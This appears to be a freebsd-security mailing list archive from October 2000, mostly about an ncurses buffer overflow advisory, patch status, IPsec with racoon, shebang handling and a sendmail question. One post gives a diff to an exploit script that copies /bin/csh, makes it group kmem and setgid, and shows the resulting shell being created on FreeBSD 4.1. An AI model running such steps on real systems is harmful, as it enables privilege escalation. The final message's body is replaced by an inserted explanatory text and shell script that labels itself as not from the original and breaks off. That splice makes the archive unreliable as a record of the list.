From: "Brian F. Feldman" Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Tue, 10 Oct 2000 20:38:16 -0400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Peter Pentchev wrote: > On Tue, Oct 10, 2000 at 09:50:28PM +0700, Rashid N. Achilov wrote: > > Przemyslaw Frasunek wrote: > > > > > > On Tue, Oct 10, 2000 at 07:02:30AM -0700, Cy Schubert - ITSD Open Systems Group wrote: > > > > For those of you who don't subscribe to BUGTRAQ, here's a heads up. > > > > > > And the exploit (in attachment). > > > > > > > Press any key to continue...sentry:[shelton] 150>sh systat.sh > > setenv: not found > > systat.sh: 69: Syntax error: Bad fd number > > Press any key to continue... > > Uhm.. it explicitly says '#!/bin/csh' at the start; why are you running > it with 'sh'? The canonical lazy person's execution method for scripts is "shell script.shell", because it is easier than "chmod +x script.shell; ./ script.shell". C shell scripts are supposed to be named .csh for consistency, or nothing at all. -- Brian Fundakowski Feldman \ FreeBSD: The Power to Serve! / green@FreeBSD.org `------------------------------' To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 10 17:49:38 2000 Delivered-To: freebsd-security@freebsd.org Received: from toad.com (toad.com [140.174.2.1]) by hub.freebsd.org (Postfix) with ESMTP id 08DF537B502 for ; Tue, 10 Oct 2000 17:49:35 -0700 (PDT) Received: from grok.example.net (unknown@cr479972-a.rct1.bc.wave.home.com [24.113.37.168]) by toad.com (8.7.5/8.7.3) with ESMTP id RAA11142; Tue, 10 Oct 2000 17:49:33 -0700 (PDT) Received: by grok.example.net (Postfix, from userid 1000) id 4A4F621316E; Tue, 10 Oct 2000 17:50:13 -0700 (PDT) Date: Tue, 10 Oct 2000 17:50:13 -0700 
From: Steve Reid
To: Mike Silbersack
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: ncurses buffer overflows (fwd)
Message-ID: <20001010175013.D9112@grok>
References: <20001010165908.C9112@grok>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
X-Mailer: Mutt 0.95.4i
In-Reply-To: ; from Mike Silbersack on Tue, Oct 10, 2000 at 07:11:01PM -0500
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Tue, Oct 10, 2000 at 07:11:01PM -0500, Mike Silbersack wrote:
> Well, the advisory states that ncurses 5.0 and before are vulnerable. It
> looks like 5.1-prerelease is what 4.1+ are using. So, until we hear more
> from warner/kris, I'm assuming that 4.0/3.x are vulnerable, but 4.1+ is
> safe.

The exploit just needs slight modification:

--- exploit.csh.orig	Tue Oct 10 17:42:49 2000
+++ exploit.csh	Tue Oct 10 17:46:53 2000
@@ -11,7 +11,7 @@
 #!/bin/csh
 
 cp /bin/csh /tmp
-/usr/sbin/chown venglin.kmem /tmp/csh
+chgrp kmem /tmp/csh
 chmod 2755 /tmp/csh
 __EOF__

4.1-R _is_ exploitable:

steve@grok:/home/steve% ./exploit.csh
-rwxr-sr-x  1 steve  kmem  622908 Oct 10 17:48 /tmp/csh
steve@grok:/home/steve% uname -srm
FreeBSD 4.1-RELEASE i386

From owner-freebsd-security Tue Oct 10 17:58: 2 2000
Delivered-To: freebsd-security@freebsd.org
Received: from toad.com (toad.com [140.174.2.1]) by hub.freebsd.org (Postfix) with ESMTP id 053BD37B66C for ; Tue, 10 Oct 2000 17:57:59 -0700 (PDT)
Received: from grok.example.net (unknown@cr479972-a.rct1.bc.wave.home.com [24.113.37.168]) by toad.com (8.7.5/8.7.3) with ESMTP id RAA11312; Tue, 10 Oct 2000 17:57:55 -0700 (PDT)
Received: by grok.example.net (Postfix, from userid 1000) id 9690F21316E; Tue, 10 Oct 2000 17:58:35 -0700 (PDT)
Date: Tue, 10 Oct 2000 17:58:35 -0700
From: Steve Reid
To: Mike Silbersack
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: ncurses buffer overflows (fwd)
Message-ID: <20001010175835.E9112@grok>
References: <20001010165908.C9112@grok> <20001010175013.D9112@grok>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
X-Mailer: Mutt 0.95.4i
In-Reply-To: <20001010175013.D9112@grok>; from Steve Reid on Tue, Oct 10, 2000 at 05:50:13PM -0700
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Tue, Oct 10, 2000 at 05:50:13PM -0700, Steve Reid wrote:
> --- exploit.csh.orig	Tue Oct 10 17:42:49 2000
> +++ exploit.csh	Tue Oct 10 17:46:53 2000
> @@ -11,7 +11,7 @@
>  #!/bin/csh
>  
>  cp /bin/csh /tmp
> -/usr/sbin/chown venglin.kmem /tmp/csh
> +chgrp kmem /tmp/csh
>  chmod 2755 /tmp/csh
>  __EOF__

BTW, the above is relative to the exploit Przemyslaw Frasunek posted to
bugtraq. The one he posted to freebsd-security, the line was:

/usr/sbin/chgrp kmem /tmp/csh

Which also doesn't work because chgrp is in /usr/bin, not /usr/sbin.

This just goes to show, that just because an exploit script doesn't
work for you, doesn't mean that you are not vulnerable. Assume the
worst!

From owner-freebsd-security Tue Oct 10 18:13:10 2000
Delivered-To: freebsd-security@freebsd.org
Received: from lynx.aba.net.au (lynx.esec.com.au [203.21.84.1]) by hub.freebsd.org (Postfix) with SMTP id EDCCE37B671 for ; Tue, 10 Oct 2000 18:13:01 -0700 (PDT)
Received: (qmail 12618 invoked from network); 11 Oct 2000 01:12:54 -0000
Received: from swun.esec.com.au (HELO eSec.com.au) (203.21.85.207) by lynx.esec.com.au with SMTP; 11 Oct 2000 01:12:54 -0000
Message-ID: <39E3C11D.6BB4D06F@eSec.com.au>
Date: Wed, 11 Oct 2000 12:23:41 +1100
From: Sam Wun
Organization: eSec
X-Mailer: Mozilla 4.74 [en] (X11; U; Linux 2.2.12 i386)
X-Accept-Language: en
MIME-Version: 1.0
Cc: freebsd-security@freebsd.org, comp.unix.bsd.openbsd.misc@eSec.com.au
Subject: Connect Ipsec between openbsd and freebsd
References: <00b301c032d3$9cd97880$1aa7dac3@krovatka.ru>
Content-Type: text/plain; charset=gb2312
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Hi,

I want to connect ipsec from openbsd to a freebsd box thru some tunnels.
I know how to setup ipsec in freebsd by recompiling the kernel and using
spdadd to define policies with setkey. It works fine between freebsd
boxes. But not sure how to connect it to other different systems, for
example, openBSD.
In openBSD, isakmpd is used for setting ipsec. I know we can use
certificate with isakmpd in OpenBSD. What about in FreeBSD? What should
these 2 systems compromise on before the ipsec tunnel can be established
between them?

Thanks
Sam.

From owner-freebsd-security Tue Oct 10 18:17:28 2000
Delivered-To: freebsd-security@freebsd.org
Received: from silby.com (cb34181-c.mdsn1.wi.home.com [24.183.3.139]) by hub.freebsd.org (Postfix) with ESMTP id A28C337B66D for ; Tue, 10 Oct 2000 18:17:23 -0700 (PDT)
Received: (qmail 4642 invoked by uid 1000); 11 Oct 2000 01:20:49 -0000
Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 11 Oct 2000 01:20:49 -0000
Date: Tue, 10 Oct 2000 20:20:49 -0500 (CDT)
From: Mike Silbersack
To: Steve Reid
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: ncurses buffer overflows (fwd)
In-Reply-To: <20001010175835.E9112@grok>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Tue, 10 Oct 2000, Steve Reid wrote:

> BTW, the above is relative to the exploit Przemyslaw Frasunek posted to
> bugtraq. The one he posted to freebsd-security, the line was:
> 
> /usr/sbin/chgrp kmem /tmp/csh
> 
> Which also doesn't work because chgrp is in /usr/bin, not /usr/sbin.
> 
> This just goes to show, that just because an exploit script doesn't
> work for you, doesn't mean that you are not vulnerable. Assume the
> worst!

Damn, it works now. Thanks for the heads up. (I can't actually get
/tmp/csh to execute, but that seems unimportant at this point.)

Mike "Silby" Silbersack

From owner-freebsd-security Tue Oct 10 18:55:25 2000
Delivered-To: freebsd-security@freebsd.org
Received: from blues.jpj.net (blues.jpj.net [204.97.17.146]) by hub.freebsd.org (Postfix) with ESMTP id 1BF2637B503 for ; Tue, 10 Oct 2000 18:55:23 -0700 (PDT)
Received: from localhost (trevor@localhost) by blues.jpj.net (right/backatcha) with ESMTP id e9B1tF609930; Tue, 10 Oct 2000 21:55:15 -0400 (EDT)
Date: Tue, 10 Oct 2000 21:55:15 -0400 (EDT)
From: Trevor Johnson
To: Mike Silbersack
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: ncurses buffer overflows (fwd)
In-Reply-To:
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

> Well, the advisory states that ncurses 5.0 and before are vulnerable. It
> looks like 5.1-prerelease is what 4.1+ are using. So, until we hear more
> from warner/kris, I'm assuming that 4.0/3.x are vulnerable, but 4.1+ is
> safe.

The fixes were applied in ncurses-20001007. We have ncurses-20000701.

I'm attempting to prepare ncurses-20001009 for importing:
http://people.freebsd.org/~trevor/ncurses/ . I've mentioned it to Peter
Wemm. It needs more testing though (I haven't even done a "make world").
-- 
Trevor Johnson
http://jpj.net/~trevor/gpgkey.txt

From owner-freebsd-security Tue Oct 10 19: 3:12 2000
Delivered-To: freebsd-security@freebsd.org
Received: from citusc17.usc.edu (citusc17.usc.edu [128.125.38.177]) by hub.freebsd.org (Postfix) with ESMTP id 1DCA637B502 for ; Tue, 10 Oct 2000 19:03:09 -0700 (PDT)
Received: (from kris@localhost) by citusc17.usc.edu (8.9.3/8.9.3) id TAA05046; Tue, 10 Oct 2000 19:03:28 -0700 (PDT)
Date: Tue, 10 Oct 2000 19:03:28 -0700
From: Kris Kennaway
To: Sam Wun
Cc: freebsd-security@FreeBSD.ORG, comp.unix.bsd.openbsd.misc@eSec.com.au
Subject: Re: Connect Ipsec between openbsd and freebsd
Message-ID: <20001010190328.A5034@citusc17.usc.edu>
References: <00b301c032d3$9cd97880$1aa7dac3@krovatka.ru> <39E3C11D.6BB4D06F@eSec.com.au>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: <39E3C11D.6BB4D06F@eSec.com.au>; from swun@eSec.com.au on Wed, Oct 11, 2000 at 12:23:41PM +1100
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Wed, Oct 11, 2000 at 12:23:41PM +1100, Sam Wun wrote:
> I want to connect ipsec from openbsd to a freebsd box thru some tunnels.
> I know how to setup ipsec in freebsd by recompiling the kernel and using
> spdadd to define policies with setkey. It works fine between freebsd
> boxes. But not sure how to connect it to other different systems, for
> example, openBSD.
> In openBSD, isakmpd is used for setting ipsec. I know we can use
> certificate with isakmpd in OpenBSD. What about in FreeBSD? What should
> these 2 systems compromise on before the ipsec tunnel can be established
> between them?

Use the racoon port.

Kris

From owner-freebsd-security Tue Oct 10 19: 4:59 2000
Delivered-To: freebsd-security@freebsd.org
Received: from citusc17.usc.edu (citusc17.usc.edu [128.125.38.177]) by hub.freebsd.org (Postfix) with ESMTP id 3AA1637B502; Tue, 10 Oct 2000 19:04:56 -0700 (PDT)
Received: (from kris@localhost) by citusc17.usc.edu (8.9.3/8.9.3) id TAA05060; Tue, 10 Oct 2000 19:05:17 -0700 (PDT)
Date: Tue, 10 Oct 2000 19:05:17 -0700
From: Kris Kennaway
To: Trevor Johnson
Cc: Mike Silbersack , freebsd-security@FreeBSD.ORG, peter@FreeBSD.ORG
Subject: Re: ncurses buffer overflows (fwd)
Message-ID: <20001010190517.B5034@citusc17.usc.edu>
References:
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: ; from trevor@jpj.net on Tue, Oct 10, 2000 at 09:55:15PM -0400
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Tue, Oct 10, 2000 at 09:55:15PM -0400, Trevor Johnson wrote:
> > Well, the advisory states that ncurses 5.0 and before are vulnerable. It
> > looks like 5.1-prerelease is what 4.1+ are using. So, until we hear more
> > from warner/kris, I'm assuming that 4.0/3.x are vulnerable, but 4.1+ is
> > safe.
> 
> The fixes were applied in ncurses-20001007. We have ncurses-20000701.
> 
> I'm attempting to prepare ncurses-20001009 for importing:
> http://people.freebsd.org/~trevor/ncurses/ . I've mentioned it to Peter
> Wemm. It needs more testing though (I haven't even done a "make world").

I believe Peter was also looking at this - I think he was basically ready
to commit. Thanks for taking a look at it, though.

Kris

From owner-freebsd-security Tue Oct 10 19: 6:11 2000
Delivered-To: freebsd-security@freebsd.org
Received: from silby.com (cb34181-c.mdsn1.wi.home.com [24.183.3.139]) by hub.freebsd.org (Postfix) with ESMTP id BBB8737B503 for ; Tue, 10 Oct 2000 19:06:06 -0700 (PDT)
Received: (qmail 4784 invoked by uid 1000); 11 Oct 2000 02:09:33 -0000
Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 11 Oct 2000 02:09:33 -0000
Date: Tue, 10 Oct 2000 21:09:33 -0500 (CDT)
From: Mike Silbersack
To: Trevor Johnson
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: ncurses buffer overflows (fwd)
In-Reply-To:
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Tue, 10 Oct 2000, Trevor Johnson wrote:

> The fixes were applied in ncurses-20001007. We have ncurses-20000701.
> 
> I'm attempting to prepare ncurses-20001009 for importing:
> http://people.freebsd.org/~trevor/ncurses/ . I've mentioned it to Peter
> Wemm. It needs more testing though (I haven't even done a "make world").

Is the patch just to not read .terminfo from the current directory when
executing setuid+setgid apps? (Just checking if it's the same as the
patch that openbsd has applied.)

Mike "Silby" Silbersack

From owner-freebsd-security Tue Oct 10 19:20:28 2000
Delivered-To: freebsd-security@freebsd.org
Received: from citusc17.usc.edu (citusc17.usc.edu [128.125.38.177]) by hub.freebsd.org (Postfix) with ESMTP id 67BE837B502 for ; Tue, 10 Oct 2000 19:20:27 -0700 (PDT)
Received: (from kris@localhost) by citusc17.usc.edu (8.9.3/8.9.3) id TAA05121; Tue, 10 Oct 2000 19:20:48 -0700 (PDT)
Date: Tue, 10 Oct 2000 19:20:47 -0700
From: Kris Kennaway
To: Igor
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: racoon problem
Message-ID: <20001010192047.C5034@citusc17.usc.edu>
References: <00b301c032d3$9cd97880$1aa7dac3@krovatka.ru>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: <00b301c032d3$9cd97880$1aa7dac3@krovatka.ru>; from igorp@mail.rbc.ru on Tue, Oct 10, 2000 at 08:03:21PM +0400
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Tue, Oct 10, 2000 at 08:03:21PM +0400, Igor wrote:
> I think the password for crypt packets must be established at this time.
> What is wrong?

Talk to snap-users@kame.net where the racoon developers hang out, and send
full debugging output (-d 0xffffffff), I think.

Kris

From owner-freebsd-security Tue Oct 10 20:10:54 2000
Delivered-To: freebsd-security@freebsd.org
Received: from rover.village.org (rover.village.org [204.144.255.49]) by hub.freebsd.org (Postfix) with ESMTP id 91BF437B502 for ; Tue, 10 Oct 2000 20:10:51 -0700 (PDT)
Received: from harmony.village.org (harmony.village.org [10.0.0.6]) by rover.village.org (8.11.0/8.11.0) with ESMTP id e9B3Ani16971; Tue, 10 Oct 2000 21:10:49 -0600 (MDT) (envelope-from imp@harmony.village.org)
Received: from harmony.village.org (localhost.village.org [127.0.0.1]) by harmony.village.org (8.9.3/8.8.3) with ESMTP id VAA32653; Tue, 10 Oct 2000 21:10:48 -0600 (MDT)
Message-Id: <200010110310.VAA32653@harmony.village.org>
To: Mike Silbersack
Subject: Re: ncurses buffer overflows (fwd)
Cc: Trevor Johnson , freebsd-security@FreeBSD.ORG
In-reply-to: Your message of "Tue, 10 Oct 2000 21:09:33 CDT."
References:
Date: Tue, 10 Oct 2000 21:10:48 -0600
From: Warner Losh
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

In message Mike Silbersack writes:
: Is the patch just to not read .terminfo from the current directory when
: executing setuid+setgid apps? (Just checking if it's the same as the
: patch that openbsd has applied.)

There are several things that were fixed in this round of patches.  I
think that this is one of them, but I have it on my list of things to
check once Peter imports the new ncurses.

Warner

From owner-freebsd-security Tue Oct 10 21:10: 7 2000
Delivered-To: freebsd-security@freebsd.org
Received: from fledge.watson.org (fledge.watson.org [204.156.12.50]) by hub.freebsd.org (Postfix) with ESMTP id 79E2437B66F; Tue, 10 Oct 2000 21:10:02 -0700 (PDT)
Received: from fledge.watson.org (robert@fledge.pr.watson.org [192.0.2.3]) by fledge.watson.org (8.9.3/8.9.3) with SMTP id AAA37803; Wed, 11 Oct 2000 00:10:00 -0400 (EDT) (envelope-from robert@fledge.watson.org)
Date: Wed, 11 Oct 2000 00:09:59 -0400 (EDT)
From: Robert Watson
X-Sender: robert@fledge.watson.org
To: "Brian F. Feldman"
Cc: Peter Pentchev , achilov@granch.ru, Przemyslaw Frasunek , freebsd-security@FreeBSD.org
Subject: Re: ncurses buffer overflows (fwd)
In-Reply-To: <200010110038.e9B0cH562984@green.dyndns.org>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Tue, 10 Oct 2000, Brian F. Feldman wrote:

> > Uhm.. it explicitly says '#!/bin/csh' at the start; why are you running
> > it with 'sh'?
> 
> The canonical lazy person's execution method for scripts is "shell
> script.shell", because it is easier than "chmod +x script.shell; ./
> script.shell".  C shell scripts are supposed to be named .csh for
> consistency, or nothing at all.

We seem to have some bugs in how shells load and run shell scripts for
other shells, and in handling of scripts with invalid or bad #! lines at
the beginning.  I think I filed a PR a while ago about handling of scripts
in single-user mode in particular.  If you feel bored someday, you could
try and fix them :-).  The general gist is the following: shells
(especially when running in single-user mode for some reason) will tend to
execute shell scripts themselves, rather than using the interpreter
defined in the file (not in multi-user mode?).  When a failure occurs in
locating or executing the interpreter, or if interpreters are recursive,
rather than failing (as the kernel execve call does), it will go ahead and
execute it using the current shell.  Doubt this could be exploited as a
security bug, but it is probably "wrong".  The kernel seems to correctly
handle layered interpreters by returning an image error (an interpreter
cannot be another interpreter, preventing recursion).
Robert N M Watson robert@fledge.watson.org http://www.watson.org/~robert/ PGP key fingerprint: AF B5 5F FF A6 4A 79 37 ED 5F 55 E9 58 04 6A B1 TIS Labs at Network Associates, Safeport Network Services To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 10 21:44:30 2000 Delivered-To: freebsd-security@freebsd.org Received: from mailhost01.reflexnet.net (mailhost01.reflexnet.net [64.6.192.82]) by hub.freebsd.org (Postfix) with ESMTP id 3CA5037B66F; Tue, 10 Oct 2000 21:44:27 -0700 (PDT) Received: from 149.211.6.64.reflexcom.com ([64.6.211.149]) by mailhost01.reflexnet.net with Microsoft SMTPSVC(5.5.1877.197.19); Tue, 10 Oct 2000 21:42:18 -0700 Received: (from cjc@localhost) by 149.211.6.64.reflexcom.com (8.11.0/8.11.0) id e9B4hXh01727; Tue, 10 Oct 2000 21:43:33 -0700 (PDT) (envelope-from cjc) Date: Tue, 10 Oct 2000 21:43:32 -0700 
From: "Crist J . Clark" To: Robert Watson Cc: "Brian F. Feldman" , Peter Pentchev , achilov@granch.ru, Przemyslaw Frasunek , freebsd-security@FreeBSD.ORG Subject: Re: ncurses buffer overflows (fwd) Message-ID: <20001010214332.G25121@149.211.6.64.reflexcom.com> Reply-To: cjclark@alum.mit.edu References: <200010110038.e9B0cH562984@green.dyndns.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0i In-Reply-To: ; from rwatson@FreeBSD.ORG on Wed, Oct 11, 2000 at 12:09:59AM -0400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org
On Wed, Oct 11, 2000 at 12:09:59AM -0400, Robert Watson wrote:
> On Tue, 10 Oct 2000, Brian F. Feldman wrote:
> > > Uhm.. it explicitly says '#!/bin/csh' at the start; why are you running
> > > it with 'sh'?
> >
> > The canonical lazy person's execution method for scripts is "shell
> > script.shell", because it is easier than "chmod +x script.shell; ./
> > script.shell". C shell scripts are supposed to be named .csh for
> > consistency, or nothing at all.
>
> We seem to have some bugs in how shells load and run shell scripts for
> other shells, and in handling of scripts with invalid or bad #! lines at
> the beginning. I think I filed a PR a while ago about handling of scripts
> in single-user mode in particular. If you feel bored someday, you could
> try and fix them :-). The general gist is the following: shells
> (especially when running in single-user mode for some reason) will tend to
> execute shell scripts themselves, rather than using the interpreter
> defined in the file (not in multi-user mode?). When a failure occurs in
> locating or executing the interpreter, or if interpreters are recursive,
> rather than failing (as the kernel execve call does), it will go ahead and
> execute it using the current shell. Doubt this could be exploited as a
> security bug, but it is probably "wrong".
> The kernel seems to correctly
> handle layered interpreters by returning an image error (an interpreter
> cannot be another interpreter, preventing recursion).

Hmmm... I always thought the fact the sh-bang started with a '#' was part of their magic. When you read in a file with an interpreter, it reads the file as a flat file. That first line starts with a '#'; it's just a comment, right? What interpreters actually use a sh-bang to change the interpreter? I thought sh-bangs were only used by exec calls.

-- Crist J. Clark cjclark@alum.mit.edu
From owner-freebsd-security Tue Oct 10 23:50:10 2000 Delivered-To: freebsd-security@freebsd.org Received: from mail.kyx.net (cr95838-b.crdva1.bc.wave.home.com [24.113.50.147]) by hub.freebsd.org (Postfix) with ESMTP id 96A4337B66F; Tue, 10 Oct 2000 23:50:06 -0700 (PDT) Received: from smp.kyx.net (unknown [10.22.22.45]) by mail.kyx.net (Postfix) with SMTP id D5B961DC05; Tue, 10 Oct 2000 23:50:33 -0700 (PDT)
From: Dragos Ruiu Organization: kyx.net To: Robert Watson , "Brian F. Feldman" Subject: Re: ncurses buffer overflows (fwd) Date: Tue, 10 Oct 2000 23:46:52 -0700 X-Mailer: KYX-CP/M [version core00-mail-92] Content-Type: text/plain Cc: Peter Pentchev , achilov@granch.ru, Przemyslaw Frasunek , freebsd-security@FreeBSD.org References: In-Reply-To: MIME-Version: 1.0 Message-Id: <0010102350400T.40602@smp.kyx.net> Content-Transfer-Encoding: 8bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Tue, 10 Oct 2000, Robert Watson wrote: >The general gyst is the following: shells > (especially when running in single-user mode for some reason) will tend to > execute shell scripts themselves, rather than using the interpreter > defined in the file (not in multi-user mode?). This behaviour seems to make sense for single user mode, where you may have dropped down to with intent of repairing things. Not all the partitions may be mounted and those other shells may not be available.... --dr To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Oct 11 1:32:46 2000 Delivered-To: freebsd-security@freebsd.org Received: from static.unixfreak.org (static.unixfreak.org [63.198.170.139]) by hub.freebsd.org (Postfix) with ESMTP id B8ED537B503; Wed, 11 Oct 2000 01:32:43 -0700 (PDT) Received: by static.unixfreak.org (Postfix, from userid 1000) id F387D1F22; Wed, 11 Oct 2000 01:06:28 -0700 (PDT) Subject: Re: ncurses buffer overflows (fwd) In-Reply-To: <20001010214332.G25121@149.211.6.64.reflexcom.com> "from Crist J . Clark at Oct 10, 2000 09:43:32 pm" To: cjclark@alum.mit.edu Date: Wed, 11 Oct 2000 01:06:28 -0700 (PDT) Cc: Robert Watson , "Brian F. Feldman" , Peter Pentchev , achilov@granch.ru, Przemyslaw Frasunek , freebsd-security@FreeBSD.ORG 
From: Dima Dorfman Reply-To: dima@unixfreak.org X-Mailer: ELM [version 2.4ME+ PL82 (25)] MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Content-Type: text/plain; charset=US-ASCII Message-Id: <20001011080628.F387D1F22@static.unixfreak.org> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org
> On Wed, Oct 11, 2000 at 12:09:59AM -0400, Robert Watson wrote:
> > On Tue, 10 Oct 2000, Brian F. Feldman wrote:
> > > > Uhm.. it explicitly says '#!/bin/csh' at the start; why are you running
> > > > it with 'sh'?
> > >
> > > The canonical lazy person's execution method for scripts is "shell
> > > script.shell", because it is easier than "chmod +x script.shell; ./
> > > script.shell". C shell scripts are supposed to be named .csh for
> > > consistency, or nothing at all.
> >
> > We seem to have some bugs in how shells load and run shell scripts for
> > other shells, and in handling of scripts with invalid or bad #! lines at
> > the beginning. I think I filed a PR a while ago about handling of scripts
> > in single-user mode in particular. If you feel bored someday, you could
> > try and fix them :-). The general gist is the following: shells
> > (especially when running in single-user mode for some reason) will tend to
> > execute shell scripts themselves, rather than using the interpreter
> > defined in the file (not in multi-user mode?). When a failure occurs in
> > locating or executing the interpreter, or if interpreters are recursive,
> > rather than failing (as the kernel execve call does), it will go ahead and
> > execute it using the current shell. Doubt this could be exploited as a
> > security bug, but it is probably "wrong". The kernel seems to correctly
> > handle layered interpreters by returning an image error (an interpreter
> > cannot be another interpreter, preventing recursion).
>
> Hmmm... I always thought the fact the sh-bang started with a '#' was
> part of their magic. When you read in a file with an interpreter, it
> reads the file as a flat file. That first line starts with a '#'; it's
> just a comment, right? What interpreters actually use a sh-bang to
> change the interpreter? I thought sh-bangs were only used by exec
> calls.

"Me too." It was my impression that the whole '#!/path/to/shell' thing started when people expressed a desire to use csh for their scripts, so someone hacked execve in their kernel to look for '#' as the first byte in the file, and if it's there, execute whatever command follows. Since not all kernels had this hack, the script would still get executed with sh on some systems, so it was decided that the sh comment character be used to keep the old hosts happy.

Regards
-- Dima Dorfman Finger dima@unixfreak.org for my public PGP key.
From owner-freebsd-security Wed Oct 11 4:15:40 2000 Delivered-To: freebsd-security@freebsd.org Received: from server.osny.com.br (osny.com.br [200.215.110.57]) by hub.freebsd.org (Postfix) with ESMTP id 4978E37B502 for ; Wed, 11 Oct 2000 04:15:33 -0700 (PDT) Received: from osny.com.br ([172.20.185.22]) by server.osny.com.br (8.10.1/8.10.1) with ESMTP id e9BBHFt04690 for ; Wed, 11 Oct 2000 09:17:17 -0200 (EDT) Message-ID: <39E43159.E2AE64CC@osny.com.br> Date: Wed, 11 Oct 2000 09:22:33 +0000
From: Michelangelo Pisa Organization: Agencia Maritima Osny X-Mailer: Mozilla 4.7 [en] (Win98; I) X-Accept-Language: en MIME-Version: 1.0 To: freebsd-security@freebsd.org Subject: Filtering mail Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org
Hi list..

When I tried to configure Procmail to filter e-mail messages on my server so that .vbs, .shs and .com (virus) files don't come in, I used the following syntax in my sendmail.cf file, but after restarting sendmail this file shows errors such as "Error rewrite line" and "(tab expected)". What is the problem with my tab? Is the syntax correct?

#pipe through procmail for processing
R$* < @ localhost > $* $#procmail $ @ /etc/procmail/filter.rc $: $1 < @ localhost . procmail . > $2
R$* < @ localhost . > $* $#procmail $ @ /etc/procmail/filter.rc $: $1 < @ localhost . procmail . > $2
R$* < @ localhost . procmail > $* $1 < @ $2. > $3

thanks
From owner-freebsd-security Wed Oct 11 7:15:34 2000 Delivered-To: freebsd-security@freebsd.org Received: from envy.vuurwerk.nl (envy.vuurwerk.nl [194.178.232.112]) by hub.freebsd.org (Postfix) with SMTP id 8ED2A37B502 for ; Wed, 11 Oct 2000 07:15:30 -0700 (PDT) Received: (qmail 98782 invoked from network); 11 Oct 2000 14:15:29 -0000 Received: from kesteren.vuurwerk.nl (HELO daemon.vuurwerk.nl) (194.178.232.59) by envy.vuurwerk.nl with SMTP; 11 Oct 2000 14:15:29 -0000 Received: (nullmailer pid 52463 invoked by uid 11109); Wed, 11 Oct 2000 14:15:31 -0000 Date: Wed, 11 Oct 2000 16:15:31 +0200
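The "tab expected" error in the question above is about field separators: sendmail parses an R line as left-hand side, right-hand side and an optional comment, separated by literal tab characters, and a rule typed with spaces between the fields is rejected when sendmail reads the file. The script below is an added example, not part of the original message or of any sendmail or procmail documentation. It flags every rule that contains no tab at all. The sample rules it writes are constructed for the demonstration (the first two with spaces, the way the question shows them, the third with a real tab); they use the $#mailer $@ host $: user form that sendmail documents, and are not a complete procmail mailer setup.

```shell
#!/bin/sh
# Added example: flag sendmail.cf rewriting rules whose fields are separated
# by spaces rather than the tab sendmail requires. Not from the original post.

# Print "line N: <rule>" for every R line in $1 that contains no tab at all.
find_untabbed_rules() {
    awk 'substr($0, 1, 1) == "R" && index($0, "\t") == 0 {
             printf "line %d: %s\n", NR, $0
         }' "$1"
}

# The same check reduced to a count; 0 means every rule has a separator.
count_untabbed_rules() {
    find_untabbed_rules "$1" | wc -l | tr -d ' '
}

# Write a constructed sample to a temp file and print its name. The first two
# rules are typed with spaces, the way the question shows them; the third
# uses a real tab. The rule text is illustrative, not a complete mailer setup.
write_sample_cf() {
    cf=$(mktemp "${TMPDIR:-/tmp}/sendmail.cf.XXXXXX") || return 1
    {
        printf '#pipe through procmail for processing\n'
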